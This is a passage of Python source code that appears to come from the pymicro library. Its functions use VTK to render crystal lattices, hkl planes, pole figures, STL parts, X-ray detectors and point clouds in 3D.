**tubeColor**: vtk color
Color of the tubes representing the atomis bonds (default: grey).
*Returns*
The method return a vtk actor for lattice edges.
'''
Edges = vtk.vtkExtractEdges()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
Edges.SetInputData(grid)
else:
Edges.SetInput(grid)
Tubes = vtk.vtkTubeFilter()
Tubes.SetInputConnection(Edges.GetOutputPort())
Tubes.SetRadius(tubeRadius)
Tubes.SetNumberOfSides(6)
Tubes.UseDefaultNormalOn()
Tubes.SetDefaultNormal(.577, .577, .577)
# Create the mapper and actor to display the cell edges.
TubeMapper = vtk.vtkPolyDataMapper()
TubeMapper.SetInputConnection(Tubes.GetOutputPort())
Edges = vtk.vtkActor()
Edges.SetMapper(TubeMapper)
Edges.GetProperty().SetDiffuseColor(tubeColor)
return Edges
def lattice_vertices(grid, sphereRadius=0.1, sphereColor=blue):
'''
Create the 3D representation of crystal lattice atoms.
*Parameters*
**grid**: vtkUnstructuredGrid
The vtkUnstructuredGrid instance representing the crystal lattice.
**sphereRadius**: float
Size of the spheres representing the atoms (default: 0.1).
**sphereColor**: vtk color
Color of the spheres representing the atoms (default: blue).
*Returns*
The method return a vtk actor for lattice vertices.
'''
# Create a sphere to use as a glyph source for vtkGlyph3D.
Sphere = vtk.vtkSphereSource()
Sphere.SetRadius(sphereRadius)
Sphere.SetPhiResolution(40)
Sphere.SetThetaResolution(40)
Vertices = vtk.vtkGlyph3D()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
Vertices.SetInputData(grid)
else:
Vertices.SetInput(grid)
Vertices.SetSourceConnection(Sphere.GetOutputPort())
# Create a mapper and actor to display the glyphs.
SphereMapper = vtk.vtkPolyDataMapper()
SphereMapper.SetInputConnection(Vertices.GetOutputPort())
SphereMapper.ScalarVisibilityOff()
Vertices = vtk.vtkActor()
Vertices.SetMapper(SphereMapper)
Vertices.GetProperty().SetDiffuseColor(sphereColor)
return Vertices
def crystal_vertices(crystal, origin=(0., 0., 0.), m=1, n=1, p=1, hide_outside=True):
'''
Create the 3D representation of the atoms in a given crystal, taking
into account the crystal lattice and the basis which can be composed
of any motif.
:param tuple origin: cartesian coordinates of the origin.
:param int m: the number of cells in the [100] direction (1 by default).
:param int n: the number of cells in the [010] direction (1 by default).
:param int p: the number of cells in the [001] direction (1 by default).
:param bool hide_outside: do not displays atoms outside the displayed unit cells if True.
:return: The method return a vtk actor with all the crystal atoms.
'''
data = vtk.vtkPolyData()
# sphere glyph for one atom
Sphere = vtk.vtkSphereSource()
Sphere.SetPhiResolution(20)
Sphere.SetThetaResolution(20)
points = lattice_points(crystal._lattice, origin, m, n, p)
# setup a vtkGlyph3D instance
Vertices = vtk.vtkGlyph3D()
Vertices.SetScaleModeToScaleByScalar()
Vertices.SetScaleFactor(1.0)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
Vertices.SetInputData(data)
else:
Vertices.SetInput(data)
Vertices.SetSourceConnection(Sphere.GetOutputPort())
Vertices.SetColorModeToColorByScalar()
# Create a mapper and actor to display the glyphs.
SphereMapper = vtk.vtkPolyDataMapper()
SphereMapper.SetInputConnection(Vertices.GetOutputPort())
SphereMapper.ScalarVisibilityOn()
atom_points = vtk.vtkPoints()
color_scalars = vtk.vtkFloatArray()
color_scalars.SetName('color')
radius_scalars = vtk.vtkFloatArray()
radius_scalars.SetName('radius')
radius = 0.1 * min(crystal._lattice._lengths) # default for atoms
bounds = np.array([m, n, p]) * crystal._lattice._lengths
for pid in range(points.GetNumberOfPoints()):
point = points.GetPoint(pid)
for l in range(len(crystal._basis)):
basis_position = crystal._basis[l] * crystal._lattice._lengths
print(point)
position = np.array(point) + np.array(basis_position)
# if needed skip things outside
eps = 1e-6
if hide_outside and (
position[0] - origin[0] > bounds[0] + eps or position[1] - origin[1] > bounds[
1] + eps or
position[2] - origin[2] > bounds[2] + eps):
continue
atom_points.InsertNextPoint(position)
color_scalars.InsertNextValue(float(l))
radius_scalars.InsertNextValue(crystal._sizes[l] * min(crystal._lattice._lengths))
data.SetPoints(atom_points)
# perpare a scalar array with the two components: radius and color
scalar_data = vtk.vtkFloatArray()
scalar_data.SetNumberOfComponents(2)
scalar_data.SetNumberOfTuples(color_scalars.GetNumberOfTuples())
scalar_data.CopyComponent(0, radius_scalars, 0)
scalar_data.CopyComponent(1, color_scalars, 0)
scalar_data.SetName('scalar_data')
data.GetPointData().AddArray(scalar_data)
data.GetPointData().SetActiveScalars('scalar_data')
# make the corresponding lut
lut = vtk.vtkLookupTable()
N = len(crystal._basis)
lut.SetNumberOfTableValues(N)
lut.Build()
for i in range(N):
color = crystal._colors[i]
lut.SetTableValue(i, color[0], color[1], color[2])
lut.SetRange(0, N - 1)
SphereMapper.SetLookupTable(lut)
SphereMapper.ColorByArrayComponent('scalar_data', 1)
atoms = vtk.vtkActor()
atoms.SetMapper(SphereMapper)
return atoms
def crystal_3d(crystal, origin=(0., 0., 0.), m=1, n=1, p=1, \
sphereRadius=0.1, tubeRadius=0.02, sphereColor=blue, tubeColor=grey, hide_outside=True):
assembly = vtk.vtkAssembly()
print(crystal)
grid = lattice_grid(crystal._lattice, origin, m, n, p)
(a, b, c) = crystal._lattice._lengths
edges = lattice_edges(grid, tubeRadius=tubeRadius * a, tubeColor=tubeColor)
vertices = crystal_vertices(crystal, origin, m, n, p, hide_outside)
assembly.AddPart(edges)
assembly.AddPart(vertices)
assembly.SetOrigin(origin) # m*a/2, n*b/2, p*c/2)
assembly.AddPosition(-np.array(origin)) # -m*a/2, -n*b/2, -p*c/2)
return assembly
def lattice_3d(lattice, origin=(0., 0., 0.), m=1, n=1, p=1, \
sphereRadius=0.05, tubeRadius=0.02, sphereColor=black, tubeColor=grey, \
crystal_orientation=None, show_atoms=True, show_edges=True, cell_clip=False):
'''
Create the 3D representation of a crystal lattice.
The lattice edges are shown using a vtkTubeFilter and the atoms are
displayed using spheres. Both tube and sphere radius can be controlled.
Crystal orientation can also be provided which rotates the whole
assembly appropriately.
The origin of the actor can be t=either specified directly using a
tuple or set using a string as follow:
* mid the middle of the lattice cell(s)
.. code-block:: python
l = Lattice.cubic(1.0)
cubic = lattice_3d(l)
ren = vtk.vtkRenderer()
ren.AddActor(cubic)
render(ren, display=True)
.. figure:: _static/lattice_3d.png
:width: 300 px
:height: 300 px
:alt: lattice_3d
:align: center
A 3D view of a cubic lattice.
:param Lattice lattice: The Lattice instance representing the crystal lattice.
:param tuple or string origin: cartesian coordinates of the origin.
:param int m: the number of cells in the [100] direction (1 by default).
:param int n: the number of cells in the [010] direction (1 by default).
:param int p: the number of cells in the [001] direction (1 by default).
:param float sphereRadius: Size of the spheres representing the atoms (default: 0.05).
:param float tubeRadius: Radius of the tubes representing the atomic bonds (default: 0.02).
:param tuple sphereColor: Color of the spheres representing the atoms (default: black).
:param tuple tubeColor: Color of the tubes representing the atomis bonds (default: grey).
:param crystal_orientation: The crystal :py:class:`~pymicro.crystal.microstructure.Orientation` with respect to the sample coordinate system (default: None).
:param bool show_atoms: Control if the atoms are shown (default: True).
:param bool show_edges: Control if the eges of the lattice are shown (default: True).
:param bool cell_clip: Clip the lattice points glyphs by the cell (default: False).
:return: The method return a vtk assembly combining lattice edges and vertices.
'''
(a, b, c) = lattice._lengths
if origin == 'mid':
origin = (m * a / 2, n * b / 2, p * c / 2)
grid = lattice_grid(lattice, (0., 0., 0.), m, n, p) # we use the actor origin
edges = lattice_edges(grid, tubeRadius=tubeRadius * min(lattice._lengths), tubeColor=tubeColor)
vertices = lattice_vertices(grid, sphereRadius=sphereRadius * min(lattice._lengths), sphereColor=sphereColor)
assembly = vtk.vtkAssembly()
if show_edges: assembly.AddPart(edges)
if show_atoms:
if cell_clip:
# use boolean operation
epsilon = 1.e-6
cube = vtk.vtkCubeSource()
cube.SetCenter(a / 2, b / 2, c / 2)
cube.SetXLength(a + epsilon)
cube.SetYLength(b + epsilon)
cube.SetZLength(c + epsilon)
strips = vtk.vtkStripper()
strips.SetInputConnection(cube.GetOutputPort())
strips.Update()
triangles = vtk.vtkTriangleFilter()
triangles.SetInputData(cube.GetOutput())
bool_filter = vtk.vtkBooleanOperationPolyDataFilter()
bool_filter.SetOperation(bool_filter.VTK_INTERSECTION)
bool_filter.SetInputConnection(0, triangles.GetOutputPort())
bool_filter.SetInputConnection(1, vertices.GetMapper().GetInputAlgorithm().GetOutputPort())
clip_mapper = vtk.vtkPolyDataMapper()
clip_mapper.SetInputConnection(bool_filter.GetOutputPort(0))
clip_mapper.SetScalarVisibility(0)
clip_actor = vtk.vtkActor()
clip_actor.SetMapper(clip_mapper)
clip_actor.GetProperty().SetColor(sphereColor)
assembly.AddPart(clip_actor)
else:
assembly.AddPart(vertices)
# finally, apply crystal orientation to the lattice
apply_translation_to_actor(assembly, -np.array(origin))
# assembly.SetOrigin(origin)#m*a/2, n*b/2, p*c/2)
if crystal_orientation != None:
apply_orientation_to_actor(assembly, crystal_orientation)
return assembly
def lattice_3d_with_planes(lattice, hklplanes, plane_origins=None, plane_colors=None, show_normal=True,
plane_opacity=1.0, **kwargs):
'''
Create the 3D representation of a crystal lattice.
HklPlanes can be displayed within the lattice cell with their normals.
A single vtk actor in form of an assembly is returned.
Additional parameters are passed to the `lattice_3d` method to control how the lattice is pictured.
.. code-block:: python
l = Lattice.cubic(1.0)
o = Orientation.from_euler([344.0, 125.0, 217.0])
hklplanes = Hklplane.get_family('111')
cubic = lattice_3d_with_planes(l, hklplanes, show_normal=True, \\
plane_opacity=0.5, crystal_orientation=o)
s3d = Scene3D()
s3d.add(cubic)
s3d.render()
.. figure:: _static/cubic_crystal_3d.png
:width: 300 px
:alt: lattice_3d_with_planes
:align: center
A 3D view of a cubic lattice with all four 111 planes displayed.
:param lattice: An instance of :py:class:`~pymicro.crystal.lattice.Lattice` corresponding to the crystal lattice to be displayed.
:param hklplanes: A list of :py:class:`~pymicro.crystal.lattice.HklPlane` instances to add to the lattice.
:param plane_origins: A list of tuples describing the plane origins (must be the same length as `hklplanes`), if None, the planes are created to pass through the middle of the lattice (default).
:param plane_colors: A list of tuples describing the plane colors (must be the same length as `hklplanes`), if None, the planes are left gray (default).
:param bool show_normal: Control if the slip plane normals are shown (default: True).
:param float plane_opacity: A float number in the [0.,1.0] range controlling the slip plane opacity.
:param **kwargs: additional parameters are passed to the `lattice_3d` method.
:returns: The method return a vtkAssembly that can be directly added to a renderer.
'''
grid = lattice_grid(lattice)
(a, b, c) = lattice._lengths
if plane_origins:
assert len(plane_origins) == len(hklplanes)
elif kwargs['origin'] == 'mid':
origin = (a / 2, b / 2, c / 2)
else:
origin = (0., 0., 0.)
if plane_colors:
assert len(plane_colors) == len(hklplanes)
# get the atoms+edges assembly corresponding to the crystal lattice
assembly = lattice_3d(lattice, **kwargs)
# display all the hkl planes within the lattice
for i, hklplane in enumerate(hklplanes):
mid = np.array([a / 2, b / 2, c / 2])
plane = vtk.vtkPlane()
plane.SetOrigin(mid)
plane.SetNormal(hklplane.normal())
plane_color = grey
if plane_colors:
plane_color = plane_colors[i]
hklplaneActor = add_plane_to_grid(plane, grid, mid, color=plane_color, opacity=plane_opacity)
if plane_origins:
origin = plane_origins[i] * np.array([a, b, c]) - mid
print('using origin', origin)
hklplaneActor.AddPosition(origin)
hklplaneActor.SetOrigin(-origin)
assembly.AddPart(hklplaneActor)
if show_normal:
# add an arrow to display the normal to the plane
arrowActor = unit_arrow_3d(origin, a * hklplane.normal(), make_unit=False)
assembly.AddPart(arrowActor)
return assembly
def lattice_3d_with_plane_series(lattice, hkl, nps=1, **kwargs):
'''
Create the 3D representation of a crystal lattice with a series of hkl planes.
HklPlanes can be displayed within the lattice cell with their normals.
A single vtk actor in form of an assembly is returned.
Additional parameters are passed to the `lattice_3d` method to control how the lattice is pictured.
.. code-block:: python
l = Lattice.cubic(1.0)
orientation = Orientation.from_euler([0, 54.74, 135]) # correspond to 111 fiber texture
copper = (1.000000, 0.780392, 0.494117) # nice copper color
copper_lattice = lattice_3d_with_plane_series(l, (1, -1, 1), nps=4, crystal_orientation=orientation, \\
origin='mid', show_atoms=True, sphereColor=copper, sphereRadius=0.1)
s3d = Scene3D()
s3d.add(cubic)
s3d.render()
.. figure:: _static/Cu111_with_planes.png
:width: 400 px
:alt: Cu111_with_planes
:align: center
A 3D view of a copper lattice with a series of successive (111) planes displayed.
:param lattice: An instance of :py:class:`~pymicro.crystal.lattice.Lattice` corresponding to the crystal lattice to be displayed.
:param hkl: A tuple of the 3 miller indices.
:param int nps: The number of planes to display in the series (1 by default).
:param **kwargs: additional parameters are passed to the `lattice_3d_with_planes` method.
:returns: The method return a vtkAssembly that can be directly added to a renderer.
'''
p = HklPlane(hkl[0], hkl[1], hkl[2], lattice)
d_hkl = p.interplanar_spacing()
(a, b, c) = lattice._lengths
mid = np.array([0.5 * a, 0.5 * b, 0.5 * c])
hkl_planes = []
plane_origins = []
for i in range(nps):
hkl_planes.append(p)
plane_origins.append(mid - (nps / 2. - 0.5 - i) * d_hkl * p.normal())
return lattice_3d_with_planes(lattice, hkl_planes, plane_origins=plane_origins, **kwargs)
def pole_figure_3d(pf, radius=1.0, show_lattice=False):
"""
Method to display a pole figure in 3d.
This method displays a sphere of radius 1 with a crystal lattice placed at the center (only shown if
the show_lattice parameter is True). The poles associated with the pole figure are shown on the outbounding
sphere as well as the projection n the equatorial plane.
:param pf: the `PoleFigure` instance .
:param float radius: the outbounding sphere radius (1 by default).
:param show_lattice: a flag to show the crystal lattice in the center of the sphere.
:return: a vtk assembly that can be added to a `Scene3D` instance.
"""
pole_figure = vtk.vtkAssembly()
orientations = pf.get_orientations()
# keep a list of useful points on the sphere
points_on_sphere = [(0.0, 0.0, -radius)] # first point is the south pole
# get the list of hkl planes
hkl_planes = pf.poles
orientation = orientations[0] # treat only the first orientation for now
g = orientation.orientation_matrix()
gt = g.transpose()
lattice_3d = lattice_3d_with_planes(pf.lattice, hkl_planes,
crystal_orientation=orientation,
show_normal=False,
origin='mid',
tubeRadius=0.2 * radius / 10,
sphereRadius=0.5 * radius / 10,
plane_opacity=0.5)
origin = 0.5 * np.array(pf.lattice._lengths)
for hkl_plane in hkl_planes:
if gt.dot(hkl_plane.normal())[2] < 0:
print('inverting hkl')
hkl_plane._h = -hkl_plane._h
hkl_plane._k = -hkl_plane._k
hkl_plane._l = -hkl_plane._l
points_on_sphere.append(radius * gt.dot(hkl_plane.normal()))
if show_lattice:
# add an arrow to display the normal to the plane
arrow_actor = unit_arrow_3d(origin, radius * hkl_plane.normal())
lattice_3d.AddPart(arrow_actor)
if show_lattice:
pole_figure.AddPart(lattice_3d)
# add the outbounding sphere
sphere_source = vtk.vtkSphereSource()
sphere_source.SetCenter(0.0, 0.0, 0.0)
sphere_source.SetRadius(radius)
sphere_source.SetPhiResolution(300)
sphere_source.SetThetaResolution(300)
sphere_mapper = vtk.vtkPolyDataMapper()
sphere_mapper.SetInputConnection(sphere_source.GetOutputPort())
sphere_mapper.ScalarVisibilityOff()
sphere_actor = vtk.vtkActor()
sphere_actor.SetMapper(sphere_mapper)
sphere_actor.GetProperty().SetOpacity(0.1)
pole_figure.AddPart(sphere_actor)
# draw all the poles on the sphere and lines to the south pole
for i, c in enumerate(points_on_sphere):
pole = vtk.vtkSphere()
pole.SetCenter(c)
pole.SetRadius(radius * 0.05)
pole_cut = vtk.vtkCutter()
pole_cut.SetInputConnection(sphere_source.GetOutputPort())
pole_cut.SetCutFunction(pole)
pole_cut_mapper = vtk.vtkPolyDataMapper()
pole_cut_mapper.SetInputConnection(pole_cut.GetOutputPort())
pole_cut_actor = vtk.vtkActor()
pole_cut_actor.SetMapper(pole_cut_mapper)
pole_cut_actor.GetProperty().SetLineWidth(2.0)
pole_cut_actor.GetProperty().SetColor(black)
pole_figure.AddPart(pole_cut_actor)
if i > 0:
# add a line between the arrow tip and the south pole
line_actor = line_3d(points_on_sphere[0], c)
line_actor.GetProperty().SetLineWidth(2.0)
line_actor.GetProperty().SetDiffuseColor(1.0, 0., 0.)
pole_figure.AddPart(line_actor)
# now add the pole on the equatorial plane
cp = np.array(c) + np.array([0, 0, radius])
cp /= cp[2] / radius # SP'/SP = r/z with r != 1
pole = vtk.vtkRegularPolygonSource()
pole.SetRadius(radius * 0.05)
pole.SetCenter(cp[0], cp[1], 0.0)
pole.SetNumberOfSides(50)
pole_ma = vtk.vtkPolyDataMapper()
pole_ma.SetInputConnection(pole.GetOutputPort())
pole_actor = vtk.vtkActor()
pole_actor.SetMapper(pole_ma)
pole_actor.GetProperty().SetColor(black)
pole_figure.AddPart(pole_actor)
# add the equatorial plane trace on the sphere
equatorial_plane_source = vtk.vtkPlaneSource()
equatorial_plane_source.SetOrigin(-radius, -radius, 0)
equatorial_plane_source.SetPoint1(radius, -radius, 0)
equatorial_plane_source.SetPoint2(-radius, radius, 0)
equatorial_plane = vtk.vtkPlane()
equatorial_plane.SetOrigin(0, 0, 0)
equatorial_plane.SetNormal(0, 0, 1)
equatorial_plane_contour = add_plane_to_grid(equatorial_plane, sphere_source.GetOutput(), None, opacity=1.0)
equatorial_plane_contour.GetProperty().SetLineWidth(2.0)
equatorial_plane_contour.GetProperty().SetColor(black)
pole_figure.AddPart(equatorial_plane_contour)
return pole_figure
def apply_translation_to_actor(actor, trans):
'''
Transform the actor (or whole assembly) using the specified translation.
:param vtkActor actor: the vtk actor.
:param trans: a 3 component numpy vector or sequence describing the translation to apply in scene units.
'''
transform = actor.GetUserTransform()
if transform == None:
transform = vtk.vtkTransform()
transform.Identity()
transform.PostMultiply()
transform.Translate(trans[0], trans[1], trans[2])
actor.SetUserTransform(transform)
def apply_rotation_to_actor(actor, R):
'''
Transform the actor with a given rotation matrix.
:param vtkActor actor: the vtk actor.
:param R: a (3x3) array representing the rotation matrix.
'''
transform = actor.GetUserTransform()
if transform is None:
transform = vtk.vtkTransform()
transform.Identity()
m = vtk.vtkMatrix4x4()
m.Identity()
for i in range(3):
for j in range(3):
m.SetElement(i, j, R[i, j])
transform.Concatenate(m)
actor.SetUserTransform(transform)
def apply_orientation_to_actor(actor, orientation):
'''
Transform the actor (or whole assembly) using the specified orientation.
Here we could use the three euler angles associated with the
orientation with the RotateZ and RotateX methods of the actor but
the components of the orientation matrix are used directly since
they are known without any ambiguity.
:param vtkActor actor: the vtk actor.
:param orientation: an instance of the :py:class:`pymicro.crystal.microstructure.Orientation` class
'''
gt = orientation.orientation_matrix().transpose()
apply_rotation_to_actor(actor, gt)
def load_STL_actor(name, ext='STL', verbose=False, color=grey, feature_edges=False):
'''Read a STL file and return the corresponding vtk actor.
:param str name: the base name of the file to read.
:param str ext: extension of the file to read.
:param bool verbose: verbose mode.
:param tuple color: the color to use for the actor.
:param bool feature_edges: show boundary edges (default False).
:return: the 3d solid in the form of a vtk actor.
'''
if verbose:
print('adding part: %s' % name)
part = vtk.vtkSTLReader()
part.SetFileName(name + '.' + ext)
part.Update()
partMapper = vtk.vtkPolyDataMapper()
partMapper.SetInputConnection(part.GetOutputPort())
partActor = vtk.vtkActor()
partActor.SetMapper(partMapper)
partActor.GetProperty().SetColor(color)
if feature_edges:
extract = vtk.vtkFeatureEdges()
extract.SetInputConnection(part.GetOutputPort())
edge_mapper = vtk.vtkPolyDataMapper()
edge_mapper.SetInputConnection(extract.GetOutputPort())
edge_mapper.SetScalarVisibility(0)
edge_actor = vtk.vtkActor()
edge_actor.SetMapper(edge_mapper)
edge_actor.GetProperty().SetColor(0, 0, 0)
edge_actor.GetProperty().SetLineWidth(3.0)
stl_part = vtk.vtkAssembly()
stl_part.AddPart(partActor)
stl_part.AddPart(edge_actor)
return stl_part
else:
return partActor
def is_in_array(cad_path, step, origin=[0., 0., 0.]):
"""Function to compute the coordinates of the points within a CAD volume, with a given step."""
part = vtk.vtkSTLReader()
part.SetFileName(cad_path)
part.Update()
# get the bounds of the geometry
bounds = part.GetOutput().GetBounds()
print(bounds)
# compute the discretization using the given step
x_sample = np.arange(bounds[0], bounds[1] + step, step) + origin[0]
print(x_sample)
y_sample = np.arange(bounds[2], bounds[3] + step, step) + origin[1]
z_sample = np.arange(bounds[4], bounds[5] + step, step) + origin[2]
n_x = len(x_sample)
n_y = len(y_sample)
n_z = len(z_sample)
print('discretization: %d x %d x %d points' % (n_x, n_y, n_z))
n_vox = n_x * n_y * n_z
print('total number of voxels is %d' % n_vox)
xx, yy, zz = np.meshgrid(x_sample, y_sample, z_sample, indexing='ij')
all_positions = np.empty((n_x, n_y, n_z, 3), dtype=float)
all_positions[:, :, :, 0] = xx
all_positions[:, :, :, 1] = yy
all_positions[:, :, :, 2] = zz
xyz = all_positions.reshape(-1, all_positions.shape[-1]) # numpy array with the point coordinates
# create our points and the associated cell array
points = vtk.vtkPoints()
points.SetNumberOfPoints(n_vox)
cells = vtk.vtkCellArray()
coord = np.zeros((n_vox, 3))
for i in range(n_vox):
points.InsertPoint(i, xyz[i][0], xyz[i][1], xyz[i][2])
cells.InsertNextCell(vtk.VTK_VERTEX)
cells.InsertCellPoint(i)
select_enclosed_points = vtk.vtkSelectEnclosedPoints()
# assign points to select_enclosed_points
points_poly_data = vtk.vtkPolyData()
points_poly_data.SetPoints(points)
select_enclosed_points.SetInputData(points_poly_data)
# assign surface geometry to select_enclosed_points
select_enclosed_points.SetSurfaceData(part.GetOutput())
select_enclosed_points.Update()
# select_enclosed_points outputs a vtkPolyData object -> exactly what we need to display
polydata = select_enclosed_points.GetOutput()
polydata.SetVerts(cells) # mandatory to see the points
polydata.GetPointData().SetActiveScalars('SelectedPoints')
is_in = numpy_support.vtk_to_numpy(polydata.GetPointData().GetArray('SelectedPoints'))
print(is_in)
print(is_in.shape)
return is_in.reshape((n_x, n_y, n_z)), xyz
def read_image_data(file_name, size, header_size=0, data_type='uint8', verbose=False):
'''
vtk helper function to read a 3d data file.
The size is needed in the form (x, y, z) as well a string describing
the data type in numpy format (uint8 is assumed by default).
Lower file left and little endian are assumed.
*Parameters*
**file_name**: the name of the file to read.
**size**: a sequence of three numbers describing the size of the 3d data set
**header_size**: size of the header to skip in bytes (0 by default)
**data_type**: a string describing the data type in numpy format ('uint8' by default)
**verbose**: verbose mode (False by default)
*Returns*
A VTK data array
'''
vtk_type = to_vtk_type(data_type)
if verbose:
print('reading scan %s with size %dx%dx%d using vtk type %d' %
(file_name, size[0], size[1], size[2], vtk_type))
reader = vtk.vtkImageReader2() # 2 is faster
reader.SetDataScalarType(vtk_type)
reader.SetFileDimensionality(3)
reader.SetHeaderSize(header_size)
reader.SetDataByteOrderToLittleEndian()
reader.FileLowerLeftOn()
reader.SetDataExtent(0, size[0] - 1, 0, size[1] - 1, 0, size[2] - 1)
reader.SetNumberOfScalarComponents(1)
reader.SetDataOrigin(0, 0, 0)
reader.SetFileName(file_name)
reader.Update()
data = reader.GetOutput()
return data
def data_outline(data, corner=False, color=black):
'''
vtk helper function to draw a bounding box around a volume.
'''
if corner:
outlineFilter = vtk.vtkOutlineCornerFilter()
else:
outlineFilter = vtk.vtkOutlineFilter()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
outlineFilter.SetInputData(data)
else:
outlineFilter.SetInput(data)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outlineFilter.GetOutputPort())
outline = vtk.vtkActor()
outline.SetMapper(outlineMapper)
outline.GetProperty().SetColor(color)
return outline
def box_3d(origin=(0, 0, 0), size=(100, 100, 100), line_color=black):
"""
Create a box of a given size.
:param tuple origin: the origin of the box in the laboratory frame.
:param tuple size: the size of the box.
:param line_color: the color to use to draw the box.
:return:
"""
box_source = vtk.vtkCubeSource()
box_source.SetBounds(origin[0], origin[0] + size[0],
origin[1], origin[1] + size[1],
origin[2], origin[2] + size[2])
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(box_source.GetOutputPort())
box = vtk.vtkActor()
box.SetMapper(mapper)
box.GetProperty().SetRepresentationToWireframe()
box.GetProperty().SetColor(line_color)
return box
def detector_3d(detector, image_name=None, show_axes=False, see_reference=True):
"""
Create a 3D detector on a 3D scene, using all tilts.
See_reference allow to plot an empty detector with dashed edge without any tilts.
:param detector: RegArrayDetector2d
:param image_name: str of the image to plot in the 3D detector 'image.png'
:return: vtk actor
"""
from pymicro.xray.detectors import RegArrayDetector2d
assembly = vtk.vtkAssembly()
detector_3d = vtk.vtkPlaneSource()
'''TODO we should define the detector plane with its origin in the top left corner, but currently this would need
to flip the image to fit our geometrical conventions, probably due to the way the texture is rendered.'''
detector_3d.SetOrigin(0., detector.get_size_mm()[0] / 2, -detector.get_size_mm()[1] / 2)
detector_3d.SetPoint1(0., -detector.get_size_mm()[0] / 2, -detector.get_size_mm()[1] / 2)
detector_3d.SetPoint2(0., detector.get_size_mm()[0] / 2, detector.get_size_mm()[1] / 2)
planeMapper = vtk.vtkPolyDataMapper()
planeMapper.SetInputConnection(detector_3d.GetOutputPort())
plane_actor = vtk.vtkActor()
plane_actor.SetMapper(planeMapper)
if image_name is not None:
# image to plot in the detector
reader = vtk.vtkPNGReader()
reader.SetFileName(image_name)
#TODO: we could use the detector data direclty here
texture = vtk.vtkTexture()
texture.SetInputConnection(reader.GetOutputPort())
plane_actor.SetTexture(texture)
# rotate the detector according to the tilts angles
apply_rotation_to_actor(plane_actor, detector.R)
print(plane_actor.GetUserMatrix())
assembly.AddPart(plane_actor)
if show_axes:
# add detector axes actor
axes_detector = axes_actor(15, axisLabels=('u', 'v', 'w'), fontSize=20, color=(0.619, 0.156, 0.886))
XYZ2uvw = np.array([detector.u_dir, detector.v_dir, detector.w_dir])
apply_rotation_to_actor(axes_detector, XYZ2uvw.T)
apply_translation_to_actor(axes_detector, detector.pixel_to_lab(0, 0)[0] - detector.ref_pos)
assembly.AddPart(axes_detector)
if see_reference:
assembly.AddPart(plane_actor)
det_ref = RegArrayDetector2d(size=(detector.size[0], detector.size[1]), tilts=(0., 0., 0.))
det_ref.pixel_size = detector.pixel_size
det_ref.ref_pos = detector.ref_pos
detector_3d_ref = vtk.vtkPlaneSource()
detector_3d_ref.SetOrigin(0., det_ref.get_size_mm()[0] / 2, -det_ref.get_size_mm()[1] / 2)
detector_3d_ref.SetPoint1(0., -det_ref.get_size_mm()[0] / 2, -det_ref.get_size_mm()[1] / 2)
detector_3d_ref.SetPoint2(0., det_ref.get_size_mm()[0] / 2, det_ref.get_size_mm()[1] / 2)
extract = vtk.vtkFeatureEdges()
extract.SetInputConnection(detector_3d_ref.GetOutputPort())
planeMapperRef = vtk.vtkPolyDataMapper()
planeMapperRef.SetInputConnection(extract.GetOutputPort())
planeMapperRef.SetScalarVisibility(0)
plane_actor_ref = vtk.vtkActor()
plane_actor_ref.SetMapper(planeMapperRef)
plane_actor_ref.GetProperty().SetColor(0, 0, 0)
plane_actor_ref.GetProperty().SetLineWidth(1.0)
plane_actor_ref.GetProperty().SetLineStipplePattern(0xf0f0)
assembly.AddPart(plane_actor_ref)
apply_translation_to_actor(assembly, detector.ref_pos)
return assembly
def build_line_mesh(points):
'''Function to construct a vtkUnstructuredGrid representing a line mesh.
:param list points: the list of points.
:returns line_mesh: the vtkUnstructuredGrid.
'''
line_mesh = vtk.vtkUnstructuredGrid()
nodes = vtk.vtkPoints()
nodes.SetNumberOfPoints(len(points))
for i in range(len(points)):
(x, y, z) = points[i]
nodes.InsertPoint(i, x, y, z)
line_mesh.SetPoints(nodes)
for i in range(len(points) - 1):
Ids = vtk.vtkIdList()
Ids.InsertNextId(i)
Ids.InsertNextId(i + 1)
line_mesh.InsertNextCell(4, Ids)
return line_mesh
def line_actor(line_grid):
line_mapper = vtk.vtkDataSetMapper()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
line_mapper.SetInputData(line_grid)
else:
line_mapper.SetInput(line_grid)
line_actor = vtk.vtkActor()
line_actor.SetMapper(line_mapper)
return line_actor
def line_3d(start_point, end_point):
'''Function to draw a line in a 3d scene.
:param tuple start_point: the line starting point.
:param tuple end_point: the line ending point.
:returns vtkActor: The method return a vtkActor of the line that can be directly \
added to a 3d scene.
'''
line_grid = build_line_mesh([start_point, end_point])
return line_actor(line_grid)
def circle_line_3d(center=(0, 0, 0), radius=1, normal=(0, 0, 1), resolution=1):
'''Function to draw a circle in a 3d scene.
:param tuple center: the center of the circle.
:param float radius: the radius of the circle.
:param tuple normal: the normal to the plane of the circle.
:param float resolution: the resolution in degree.
:returns vtkActor: The method return a vtkActor that can be directly added to a 3d scene.
'''
n = int(360 / resolution)
line_points = []
line_points.append([center[0] + radius, center[1], center[2]]) # starting point
for i in range(n):
line_points.append([center[0] + radius * np.cos(resolution * (i + 1) * np.pi / 180), \
center[1] + radius * np.sin(resolution * (i + 1) * np.pi / 180), \
center[2]])
line_grid = build_line_mesh(line_points)
return line_actor(line_grid)
def point_cloud_3d(data_points, point_color=(0, 0, 0), point_size=1):
'''Function to display a point cloud in a 3d scene.
:param list data_points: the list of points in he cloud.
:param tuple point_color: the color to use to display the points.
:param float point_size: the size of the points.
:returns: The method return a vtkActor of the point cloud that can be directly added to a 3d scene.
'''
data = vtk.vtkPolyData()
points = vtk.vtkPoints()
cells = vtk.vtkCellArray()
points.SetNumberOfPoints(len(data_points))
for i in range(len(data_points)):
(x, y, z) = data_points[i]
points.InsertPoint(i, x, y, z)
cells.InsertNextCell(1)
cells.InsertCellPoint(i)
data.SetPoints(points)
data.SetVerts(cells)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(data)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(point_color)
actor.GetProperty().SetPointSize(point_size)
return actor
def contourFilter(data, value, color=grey, diffuseColor=grey, opacity=1.0, discrete=False):
'''This method create an actor running a contour filter through the
given data set.
The data set can be equally given in numpy or VTK format (it will be
converted to VTK if needed). The method may require a fair amount of
